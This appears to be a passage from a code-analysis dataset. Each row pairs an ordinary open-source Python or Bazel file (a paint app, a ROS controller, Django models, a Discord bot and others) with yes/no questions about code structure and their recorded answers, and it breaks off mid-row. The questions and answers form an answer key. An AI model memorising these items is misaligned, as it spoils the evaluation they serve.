source string | points list | n_points int64 | path string | repo string |
|---|---|---|---|---|
from cv2 import cv2 as cv
import numpy as np
from Pincel import Pincel
from Cor import Cor
desenhando = False
cor = Cor(0, 0, 0)
pincel = Pincel(0, 0, cor, 0)
def nada(x):
pass
def desenho(event, x, y, flags, param):
global pincel,cor,desenhando
pincel.x = x
pincel.y = y
if event == cv.EVENT_LBUTTONDOWN:
desenhando = True
elif event == cv.EVENT_MOUSEMOVE:
if desenhando:
cv.circle(img, (pincel.x, pincel.y), pincel.espessura, (pincel.cor.b, pincel.cor.g, pincel.cor.r), -1)
elif event == cv.EVENT_LBUTTONUP:
desenhando = False
cv.circle(img, (pincel.x, pincel.y), pincel.espessura, (pincel.cor.b, pincel.cor.g, pincel.cor.r), -1)
if __name__ == "__main__":
img = np.zeros((400, 612, 3), np.uint8)
cv.namedWindow("Paint")
# Criando as trackBars par as cores
cv.createTrackbar("R", "Paint", 0, 255, nada)
cv.createTrackbar("G", "Paint", 0, 255, nada)
cv.createTrackbar("B", "Paint", 0, 255, nada)
cv.createTrackbar("Espessura", "Paint", 10, 50, nada)
cv.setMouseCallback('Paint', desenho)
while True:
cv.imshow("Paint", img)
k = cv.waitKey(1) & 0xFF
if k == 27:
break
# Pega a posição atual do trackbar
r = cv.getTrackbarPos('R', 'Paint')
g = cv.getTrackbarPos('G', 'Paint')
b = cv.getTrackbarPos('B', 'Paint')
pincel.cor.r = r
pincel.cor.g = g
pincel.cor.b = b
raio = cv.getTrackbarPos("Espessura", 'Paint')
pincel.espessura = raio
#img[:] = [b, g, r]
cv.destroyAllWindows()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | main.py | ItaloDias-stack/paintApplication |
#!/usr/bin/python
'''Controls the hud UI and resets the video stream as necessary.'''
import roslib; roslib.load_manifest('reefbot_hudui')
import rospy
import subprocess
import os.path
import sys
import re
import os
import signal
import multiprocessing
def WatchVideoThread(proc):
errorWatcher = VideoErrorWatcher(proc)
for line in proc.stdout:
if not errorWatcher.CheckLogMessage(line):
break
class VideoErrorWatcher:
'''Class that replaces stderr so that we can count the video errors are reset if necessary.
Return true if the output should still be processed'''
def __init__(self, proc):
self.maxErrorMsgs = rospy.get_param('~max_video_errors', 20)
self.curCount = 0
self.errorRe = re.compile(r'.*number of reference frames exceeds max.*')
self.proc = proc
def CheckLogMessage(self, msg):
if self.errorRe.match(msg):
self.curCount = self.curCount + 1
if self.curCount > self.maxErrorMsgs:
rospy.logerr("Killing the hud process. Please wait for it to restart")
os.kill(proc.pid, signal.SIGTERM)
self.curCount = 0
return False
rospy.loginfo(msg)
return True
if __name__ == '__main__':
rospy.init_node('HudController')
scriptDir = os.path.dirname(sys.argv[0])
while not rospy.is_shutdown():
rospy.logwarn("Starting the HUD UI process")
proc = subprocess.Popen([os.path.join(scriptDir, 'hudui.py')],
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE)
try:
watcherThread = multiprocessing.Process(target=WatchVideoThread,
args=tuple([proc]))
watcherThread.start()
proc.wait()
watcherThread.terminate()
finally:
if proc.poll() is None:
rospy.logwarn("Killing the hudui.py process")
proc.kill()
proc.wait()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | reefbot_hudui/bin/HudController.py | MRSD2018/reefbot-1 |
# -*- coding: utf-8 -*- #
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""List network endpoint groups command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute import lister
from googlecloudsdk.calliope import base
class List(base.ListCommand):
"""Lists Google Compute Engine network endpoint groups."""
@staticmethod
def Args(parser):
parser.display_info.AddFormat("""\
table(
name,
selfLink.scope().segment(-3).yesno(no="global"):label=LOCATION,
networkEndpointType:label=ENDPOINT_TYPE,
size
)
""")
def Run(self, args):
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = holder.client
request_data = lister.ParseMultiScopeFlags(args, holder.resources)
list_implementation = lister.MultiScopeLister(
client,
aggregation_service=client.apitools_client.networkEndpointGroups)
return lister.Invoke(request_data, list_implementation)
List.detailed_help = base_classes.GetZonalListerHelp('network endpoint groups')
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
... | 3 | lib/surface/compute/network_endpoint_groups/list.py | kustodian/google-cloud-sdk |
from django.db import models
from django.utils.translation import gettext_lazy as _
from Hydro.device.models import Device
class Point(models.Model):
_lat = models.DecimalField(_("Latitude"), max_digits=12, decimal_places=9)
_lng = models.DecimalField(_("Longitude"), max_digits=12, decimal_places=9)
def __str__(self):
return "{},{}".format(self._lat, self._lng)
class DataPoint(models.Model):
device = models.ForeignKey(Device, on_delete=models.CASCADE)
location = models.ForeignKey(Point, on_delete=models.CASCADE, null=True)
added_at = models.DateTimeField(_("Added at"), auto_now_add=True)
collected_at = models.DateTimeField(_("Collected at"))
data = models.IntegerField(_("Data"))
type = models.CharField(_("Type"), max_length=50, blank=True)
extra = models.TextField(_("Extra"), blank=True)
def get_absolute_url(self):
pass
def __str__(self):
return "{} ==> {}".format(self.type, self.data)
@property
def owner(self):
return self.device.owner
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answ... | 3 | Hydro/datapoint/models.py | p-v-o-s/hydro |
import argparse
import sys
from typing import List
from .format_manifest import format_manifest_command
from .index import index_command
from .update import update_command
from .channel import build_channel_command
def parse_arguments(argv: List[str]) -> argparse.Namespace:
parser = argparse.ArgumentParser(
prog=argv[0], description="nur management commands"
)
subparsers = parser.add_subparsers(description="subcommands")
build_channel = subparsers.add_parser("build-channel")
build_channel.add_argument('directory')
build_channel.set_defaults(func=build_channel_command)
format_manifest = subparsers.add_parser("format-manifest")
format_manifest.set_defaults(func=format_manifest_command)
update = subparsers.add_parser("update")
update.set_defaults(func=update_command)
index = subparsers.add_parser("index")
index.set_defaults(func=index_command)
return parser.parse_args(argv[1:])
def main() -> None:
args = parse_arguments(sys.argv)
args.func(args)
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"an... | 3 | nur/__init__.py | dezgeg/NUR |
'''
Helper functions for ``image_slicer``.
'''
import os
from PIL import Image
def get_basename(filename):
"""Strip path and extension. Return basename."""
return os.path.splitext(os.path.basename(filename))[0]
def open_images(directory):
"""Open all images in a directory. Return tuple of Image instances."""
return [Image.open(file) for file in os.listdir(directory)]
def get_columns_rows(filenames):
"""Derive number of columns and rows from filenames."""
tiles = []
for filename in filenames:
row, column = os.path.splitext(filename)[0][-5:].split('_')
tiles.append((int(row), int(column)))
rows = [pos[0] for pos in tiles]; columns = [pos[1] for pos in tiles]
num_rows = max(rows); num_columns = max(columns)
return (num_columns, num_rows)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/c... | 3 | image_slicer/helpers.py | wolfembers/image_slicer |
class Links:
def __init__(self):
self.mineral_id = None
self.controller_id = None
self.source_ids = []
self.other_ids = []
self.storage_id = None
self.terminal_id = None
def get_mineral(self):
return Game.getObjectById(self.mineral_id)
def get_controller(self):
return Game.getObjectById(self.controller_id)
def get_sources(self):
return [Game.getObjectById(s) for s in self.source_ids]
def get_storage(self):
return Game.getObjectById(self.storage_id)
def get_terminal(self):
return Game.getObjectById(self.terminal_id)
def get_others(self):
return [Game.getObjectById(s) for s in self.other_ids]
def operational(self):
return self.controller_id is not None and len(self.source_ids) == 2 # TODO: == number of sources in the room
def __str__(self):
return f"mineral={self.mineral_id}, controller={self.controller_id}, sources={self.source_ids}, storage={self.storage_id}, terminal={self.terminal_id}"
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | src/room_manager/links.py | ppolewicz/screeps-starter-python |
"""Tests for the main module."""
import unittest
from unittest.mock import Mock, patch
from yala.main import LinterRunner
class TestLinterRunner(unittest.TestCase):
"""Test the LinterRunner class."""
@patch('yala.main.Config')
def test_chosen_not_found(self, mock_config):
"""Should print an error when chosen linter is not found."""
# Linter chosen by the user
name = 'my linter'
mock_config.user_linters = [name]
_, stderr = self._path_and_run(mock_config, name)
self.assertIn('Did you install', stderr[0])
@patch('yala.main.Config')
def test_not_chosen_not_found(self, mock_config):
"""Should not print an error when chosen linter is not found."""
# No linters chosen by the user
mock_config.user_linters = []
stdout, stderr = self._path_and_run(mock_config)
self.assertEqual(0, len(stdout))
self.assertEqual(0, len(stderr))
def _path_and_run(self, mock_config, name='my linter'):
cls = self._mock_linter_class(name)
mock_config.get_linter_classes.return_value = [cls]
with patch('yala.main.subprocess.run', side_effect=FileNotFoundError):
linter_cfg_tgts = cls, mock_config, []
return LinterRunner.run(linter_cfg_tgts)
@staticmethod
def _mock_linter_class(name):
linter_class = Mock()
linter = linter_class.return_value
linter.command_with_options = linter.name = name
return linter_class
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written ... | 3 | tests/main.py | viniarck/yala |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import random
class Compose:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, coords, feats):
for transform in self.transforms:
coords, feats = transform(coords, feats)
return coords, feats
class Jitter:
def __init__(self, mu=0, sigma=0.01):
self.mu = mu
self.sigma = sigma
def __call__(self, coords, feats):
if random.random() < 0.95:
feats += np.random.normal(self.mu, self.sigma, (feats.shape[0], feats.shape[1]))
return coords, feats
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true... | 3 | pretrain/pointcontrast/lib/transforms.py | Shreyas-Gururaj/Point_Contrast_ME0.5.3 |
# Implement int sqrt(int x).
# Compute and return the square root of x, where x is guaranteed to be a non-negative integer.
# Since the return type is an integer, the decimal digits are truncated and only the integer part of the result is returned.
# Example 1:
# Input: 4
# Output: 2
# Example 2:
# Input: 8
# Output: 2
# Explanation: The square root of 8 is 2.82842..., and since
# the decimal part is truncated, 2 is returned.
class Solution:
def mySqrt(self, x):
"""
:type x: int
:rtype: int
"""
if x == 0:
return 0
elif x < 4:
return 1
elif x < 9:
return 2
res = self.helper(x, 0, x//2)
return res
def helper(self, x, left, right):
mid = (left + right)//2
if mid**2 <= x and (mid+1)**2:
return mid
elif mid**2 > x:
right = mid
elif mid**2 < x:
left = mid
return self.helper(x, left, right)
# Time: O(log(n))
# Space: O(1)
# Difficulty: easy | [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | Math/python/leetcode69_Sqrt_x.py | wenxinjie/leetcode |
from typing import List, Optional
import aiohttp
import json
from aiohttp.client import ClientSession
from itspylearning.consts import ITSLEARNING_URL
from itspylearning.organisation import Organisation
_clientSession: Optional[ClientSession] = None
def _getClient() -> aiohttp.ClientSession:
global _clientSession
if(_clientSession is None):
_clientSession = aiohttp.ClientSession()
return _clientSession
async def search_organisations(query) -> List[dict]:
response = await _getClient().get(f"{ITSLEARNING_URL}/restapi/sites/all/organisations/search/v1/?searchText={query}")
rawData = await response.text()
data = json.loads(rawData)
matches = []
for match in data["EntityArray"]:
matches.append({"id": match["CustomerId"], "name": match["SiteName"],})
await close_session()
return matches
async def fetch_organisation( id) -> Organisation:
response = await _getClient().get(f"{ITSLEARNING_URL}/restapi/sites/{id}/v1")
if response.status != 200:
raise Exception('Request failure.')
rawData = await response.text()
data = json.loads(rawData)
if data == None:
raise Exception("Organisation did not exist.")
organisation = Organisation(data)
await close_session()
return organisation
async def close_session():
global _clientSession
await _clientSession.close()
_clientSession = None | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer"... | 3 | itspylearning/itslearning.py | HubertJan/itspylearning |
load("@rules_cc//cc:defs.bzl", "cc_binary", "cc_library", "cc_test")
load("@rules_cuda//cuda:defs.bzl", "requires_cuda_enabled")
load("//c10/macros:cmake_configure_file.bzl", "cmake_configure_file")
load("//tools/config:defs.bzl", "if_cuda")
def _genrule(**kwds):
if _enabled(**kwds):
native.genrule(**kwds)
def _is_cpu_static_dispatch_build():
return False
def _py_library(name, **kwds):
deps = [dep for dep in kwds.pop("deps", []) if dep != None]
native.py_library(name = name, deps = deps, **kwds)
def _requirement(_pypi_project):
return None
# Rules implementation for the Bazel build system. Since the common
# build structure aims to replicate Bazel as much as possible, most of
# the rules simply forward to the Bazel definitions.
rules = struct(
cc_binary = cc_binary,
cc_library = cc_library,
cc_test = cc_test,
cmake_configure_file = cmake_configure_file,
filegroup = native.filegroup,
genrule = _genrule,
glob = native.glob,
if_cuda = if_cuda,
is_cpu_static_dispatch_build = _is_cpu_static_dispatch_build,
py_binary = native.py_binary,
py_library = _py_library,
requirement = _requirement,
requires_cuda_enabled = requires_cuda_enabled,
select = select,
test_suite = native.test_suite,
)
def _enabled(tags = [], **_kwds):
"""Determines if the target is enabled."""
return "-bazel" not in tags
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (ex... | 3 | tools/bazel.bzl | YifanShenSZ/pytorch |
import logging
from tenacity import retry, stop_after_attempt, wait_fixed, before_log, after_log
from app.db.external_session import db_session
from app.db.init_db import init_db
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
max_tries = 60 * 5 # 5 minutes
wait_seconds = 1
@retry(
stop=stop_after_attempt(max_tries),
wait=wait_fixed(wait_seconds),
before=before_log(logger, logging.INFO),
after=after_log(logger, logging.WARN),
)
def init():
# Try to create session to check if DB is awake
db_session.execute("SELECT 1")
def main():
logger.info("Initializing service")
init()
logger.info("Service finished initializing")
if __name__ == "__main__":
main()
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?... | 3 | {{cookiecutter.project_slug}}/backend/app/app/backend_pre_start.py | abnerjacobsen/full-stack |
'''
Created on 2019年6月19日
@author: bkd
'''
from tkinter import *
def data():
for i in range(50):
Label(frame, text=i).grid(row=i, column=0)
Label(frame, text="my text" + str(i)).grid(row=i, column=1)
Label(frame, text="..........").grid(row=i, column=2)
def myfunction(event):
# canvas.configure(scrollregion=canvas.bbox("all"), width=200, height=200)
canvas.configure(scrollregion=canvas.bbox("all"))
# pass
root = Tk()
# sizex = 800
# sizey = 600
# posx = 100
# posy = 100
# root.wm_geometry("%dx%d+%d+%d" % (sizex, sizey, posx, posy))
# myframe = Frame(root, relief=GROOVE, width=50, height=100, bd=1)
myframe = Frame(root, bd=5, background="blue")
# myframe.place(x=10, y=10)
myframe.pack()
# 外框架 [画布[内框架],滚动条]
# 1.画布
canvas = Canvas(myframe)
# 2.画布上的内框架
frame = Frame(canvas, bd=5, background="red")
# canvas.create_window((0, 0), window=frame, anchor='nw')
canvas.create_window((0, 0), window=frame)
# 3.外框架上的滚动条
myscrollbar = Scrollbar(myframe, orient="vertical", command=canvas.yview, bd=5, background="yellow", width=25)
# 配置外框架内的组件的位置
canvas.pack(side="left", fill=BOTH, expand=True)
myscrollbar.pack(side="right", fill="y")
# 配置动作
canvas.configure(yscrollcommand=myscrollbar.set)
frame.bind("<Configure>", myfunction)
data()
root.mainloop()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | test/t22.py | bkdwei/kdGUI |
import unittest
from app.models import NewsArticle
class ArticleTest(unittest.TestCase):
'''
Test Class to test the behaviour of the NewsArticle class
'''
def setUp(self):
'''
Set up method that will run before every Test
'''
self.new_article = NewsArticle("CNN", "John Doe", "Christmas in the City", "/home", "/image", "30-05-2020", "Lorem", "Ipsum")
def test_instance(self):
self.assertTrue(isinstance(self.new_article,NewsArticle)) | [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true... | 3 | tests/test_news_article.py | Collin9726/Marekani |
import os
from typing import TYPE_CHECKING
from modules.base import ModuleProcessor
from opta.core.terraform import get_terraform_outputs
from opta.exceptions import UserErrors
if TYPE_CHECKING:
from opta.layer import Layer
from opta.module import Module
class MongodbAtlasProcessor(ModuleProcessor):
def __init__(self, module: "Module", layer: "Layer"):
if module.data["type"] != "mongodb-atlas":
raise Exception(
f"The module {module.name} was expected to be of type mongodb-atlas"
)
super(MongodbAtlasProcessor, self).__init__(module, layer)
def pre_hook(self, module_idx: int) -> None:
required_env_set = set(["MONGODB_ATLAS_PUBLIC_KEY", "MONGODB_ATLAS_PRIVATE_KEY"])
if not required_env_set.issubset(set(os.environ.keys())):
raise UserErrors(
"Opta did not find environment variable(s), please set them and retry: {}".format(
required_env_set - set(os.environ.keys())
)
)
super(MongodbAtlasProcessor, self).pre_hook(module_idx)
def process(self, module_idx: int) -> None:
self.module.data["cloud_provider"] = self.layer.cloud.upper()
if self.module.data["cloud_provider"] == "LOCAL":
self.module.data["cloud_provider"] = "AWS" # For local, always spin up in AWS
self.module.data["region"] = "US_EAST_1"
base_layer = self.layer.root()
root_outputs = get_terraform_outputs(base_layer)
self.module.data["public_nat_ips"] = root_outputs["public_nat_ips"]
super(MongodbAtlasProcessor, self).process(module_idx)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | modules/mongodb_atlas/mongodb_atlas.py | riddopic/opta |
class WordDictionary(object):
def __init__(self):
"""
initialize your data structure here.
"""
self.trie = {}
def addWord(self, word):
"""
Adds a word into the data structure.
:type word: str
:rtype: void
"""
trie=self.trie
for c in word:
if c not in trie:
trie[c] = {}
trie = trie[c]
trie['#'] = '#'
def search(self, word, trie = None):
"""
Returns if the word is in the data structure. A word could
contain the dot character '.' to represent any one letter.
:type word: str
:rtype: bool
"""
if not trie:
trie = self.trie
if not word:
if '#' in trie:
return True
else:
return False
c = word[0]
if c in trie:
return self.search(word[1:],trie[c])
elif c == '.':
for cc in trie:
if cc != '#' and self.search(word[1:],trie[cc]):
return True
return False
# Your WordDictionary object will be instantiated and called as such:
# wordDictionary = WordDictionary()
# wordDictionary.addWord("word")
# wordDictionary.search("pattern") | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding s... | 3 | backtracking/wordDictionaryUsingTrie.py | saai/LeetcodePythonSolutions |
#!/usr/bin/env python3
import tensorflow as tf
from layers.spectral_normalization import SpectralNormalization
class SpadeBN(tf.keras.layers.Layer):
"""SPADE BatchNormalization
Sources:
https://towardsdatascience.com/implementing-spade-using-fastai-6ad86b94030a
"""
def __init__(self, width: int = 128, kernel_size=3, **kwargs):
self.bn = tf.keras.layers.experimental.SyncBatchNormalization()
self.conv0 = SpectralNormalization(
tf.keras.layers.Conv2D(width, kernel_size=kernel_size, activation="relu")
)
self.conv1 = SpectralNormalization(
tf.keras.layers.Conv2D(width, kernel_size=kernel_size, activation="relu")
)
self.conv2 = SpectralNormalization(
tf.keras.layers.Conv2D(width, kernel_size=kernel_size, activation="relu")
)
def call(self, x: tf.Tensor, cond: tf.Tensor):
interim_conv = self.conv0(cond)
gamma = self.conv1(interim_conv)
beta = self.conv2(interim_conv)
outputs = self.bn(x) * gamma + beta
return outputs
def get_config(self):
config = super().get_config()
config_update = {"width": self.width, "kernel_size": 3}
config.update(config_update)
return config
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding se... | 3 | layers/spadebn.py | ackness/GazeFlow |
import atexit
from .MecanumRover_MotorDriver import MecanumRover_MotorDriver
import traitlets
from traitlets.config.configurable import Configurable
class Motor(Configurable):
value = traitlets.Float()
# config
alpha = traitlets.Float(default_value=1.0).tag(config=True)
beta = traitlets.Float(default_value=0.0).tag(config=True)
def __init__(self, driver, channel, *args, **kwargs):
super(Motor, self).__init__(*args, **kwargs) # initializes traitlets
self._driver = driver
self._motor = self._driver.getMotor(channel)
atexit.register(self._release)
@traitlets.observe('value')
def _observe_value(self, change):
self._write_value(change['new'])
def _write_value(self, value):
"""Sets motor value between [-1, 1]"""
# ジョイスティック等の値ブレ対策
if abs(value) <= 0.05:
value = 0.0
#モータの目標速度(mm/s)に変換。※最高1300mm/s
mapped_value = int(1300.0 * (self.alpha * value + self.beta))
speed = min(max(mapped_value, -1300), 1300)
self._motor.setSpeed(speed)
def _release(self):
"""Stops motor by releasing control"""
self._motor.setSpeed(0)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | jetbot/motor.py | vstoneofficial/jetbot-mecanum |
"""empty message
Revision ID: 0092_add_inbound_provider
Revises: 0091_letter_billing
Create Date: 2017-06-02 16:07:35.445423
"""
# revision identifiers, used by Alembic.
revision = '0092_add_inbound_provider'
down_revision = '0091_letter_billing'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
op.add_column('inbound_sms', sa.Column('provider', sa.String(), nullable=True))
def downgrade():
op.drop_column('inbound_sms', 'provider')
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?... | 3 | migrations/versions/0092_add_inbound_provider.py | tlwr/notifications-api |
class GURL:
"""
GURL is Google URL generator class which has 2 methods and constructor which takes in the query
but has got 4 other parameters as well, Generate: which generates
URL and get_url : which returns the string of generated url
"""
def __init__(self, query, limit=100, filetype='html', timeperiod='w', safemode='active'):
"""
This is the constructor which takes the query string and converts it into a parameterised
google accepted URL.
"""
self.base_url = "https://google.com"
self.query = query.replace(' ', '+')
self.limit = limit
self.filetype = filetype
self.timeperiod = timeperiod
self.safemode = safemode
self.url = None
def generate(self):
""" This method
"""
self.url = self.base_url + "/search?q={0}&num={1}&as_filetype='{2}'&as_qdr={3}&safe={4}".format(self.query, self.limit, self.filetype, self.timeperiod, self.safemode)
print("GENERATED URL : '{}'".format(self.url))
def get_url(self):
""" This method returns the generated URL in a string format """
return self.url
if __name__ == '__main__':
OBJ = GURL('SLoP')
OBJ.generate()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer":... | 3 | Python/Tags_Scraper/URL_generator.py | CharvyJain/Rotten-Scripts |
#!/usr/bin/env python3
import logging
from discord import Intents
from discord.ext.commands import Bot, Context, check, when_mentioned_or
from config import CONFIG
from utils.utils import is_compsoc_exec_in_guild
DESCRIPTION = """
Apollo is the Discord bot for the University of Warwick Computing Society, designed to augment the server with a number of utilities and website services.
Apollo is open source and available at: https://github.com/UWCS/apollo. Pull requests are welcome!
"""
# The command extensions to be loaded by the bot
EXTENSIONS = [
"cogs.commands.admin",
"cogs.commands.blacklist",
"cogs.commands.counting",
"cogs.commands.date",
"cogs.commands.flip",
"cogs.commands.karma",
"cogs.commands.lcalc",
"cogs.commands.misc",
"cogs.commands.quotes",
"cogs.commands.reminders",
"cogs.commands.roll",
"cogs.commands.roomsearch",
"cogs.commands.say",
"cogs.commands.tex",
"cogs.commands.widen",
"cogs.database",
"cogs.irc",
"cogs.parallelism",
"cogs.welcome",
]
intents = Intents.default()
intents.members = True
bot = Bot(
command_prefix=when_mentioned_or("!"), description=DESCRIPTION, intents=intents
)
@bot.command()
@check(is_compsoc_exec_in_guild)
async def reload_cogs(ctx: Context):
for extension in EXTENSIONS:
bot.reload_extension(extension)
await ctx.message.add_reaction("✅")
@bot.event
async def on_ready():
if CONFIG.BOT_LOGGING:
logging.info("Logged in as")
logging.info(str(bot.user))
logging.info("------")
def main():
if CONFIG.BOT_LOGGING:
logging.basicConfig(level=logging.WARNING)
for extension in EXTENSIONS:
try:
logging.info(f"Attempting to load extension {extension}")
bot.load_extension(extension)
except Exception as e:
logging.exception("Failed to load extension {extension}", exc_info=e)
bot.run(CONFIG.DISCORD_TOKEN)
if __name__ == "__main__":
main()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | apollo.py | ericthelemur/apollo |
from typing import List
from config import IRC
import requests
import ipaddress
import fido
from modules.access import require_permission, Levels
from models import SessionManager, config
from modules import configmanager
import logging
log = logging.getLogger(__name__)
@require_permission(level=Levels.OP, message='DENIED!')
async def lockdown(bot: fido, channel: str, sender: str, args: List[str]):
ldstatus = configmanager.get_config('droneprotection', 'lockdown')
if ldstatus:
await bot.message(channel, "LOCKDOWN: Lockdown is already in effect.")
else:
await bot.message(channel, "LOCKDOWN: Locking down!")
await bot.message("#ratchat", f"*** LOCKDOWN INITIATED *** Manual lockdown initiated, "
f"new connections failing drone scans will now be KILLed and "
f"non-clients redirected to #NewRats. This may cause some "
f"clients to not be able to connect.")
await bot.raw(f"MODE #ratchat +b ~f:#NewRats:~G:unknown-users\n")
configmanager.set_config('droneprotection', 'lockdown', "True")
@require_permission(level=Levels.OP, message='DENIED!')
async def disable_lockdown(bot: fido, channel: str, sender: str, args: List[str]):
ldstatus = configmanager.get_config('droneprotection', 'lockdown')
if not ldstatus:
await bot.message(channel, "LOCKDOWN: Lockdown isn't enabled, doing nothing.")
else:
await bot.message(channel, "LOCKDOWN: Restoring normal operations.")
await bot.message("#ratchat", f"*** LOCKDOWN CLEARED *** Normal operations resumed. Channel "
f"join restrictions lifted, non-clients will now directly "
f"join #ratchat.")
await bot.raw(f"MODE #ratchat -b ~f:#NewRats:~G:unknown-users\n")
configmanager.del_config('droneprotection', 'lockdown')
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding se... | 3 | modules/commands/lockdown.py | FuelRats/FIDO |
def topla(a, b): return a + b
print(topla(2, 3))
topla2 = lambda a, b: a + b
print(topla2(2, 3))
def listeyiGoster(liste, gosteriFonksiyonu):
for i in liste:
print(gosteriFonksiyonu(i))
list = [
{"id": 1, "ad": "Alper", "soyad": "Konuralp" },
{"id": 2, "ad": "Burcu", "soyad": "Konuralp"},
{"id": 3, "ad": "Yağmur", "soyad": "Konuralp"},
]
listeyiGoster(list, lambda satir: f"{satir['ad']} {satir['soyad']}")
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding sel... | 3 | E028/main.py | alperkonuralp/AlperIlePython |
"""
# Author
Jakob Krzyston (jakobk@gatech.edu)
# Purpose
Build architecture for I/Q modulation classification as seen in Krzyston et al. 2020
"""
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
##### LINEAR COMBINATION FOR COMPLEX CONVOLUTION #####
class LC(nn.Module):
def __init__(self):
super(LC, self).__init__()
#this matrix adds the first and third columns of the output of Conv2d
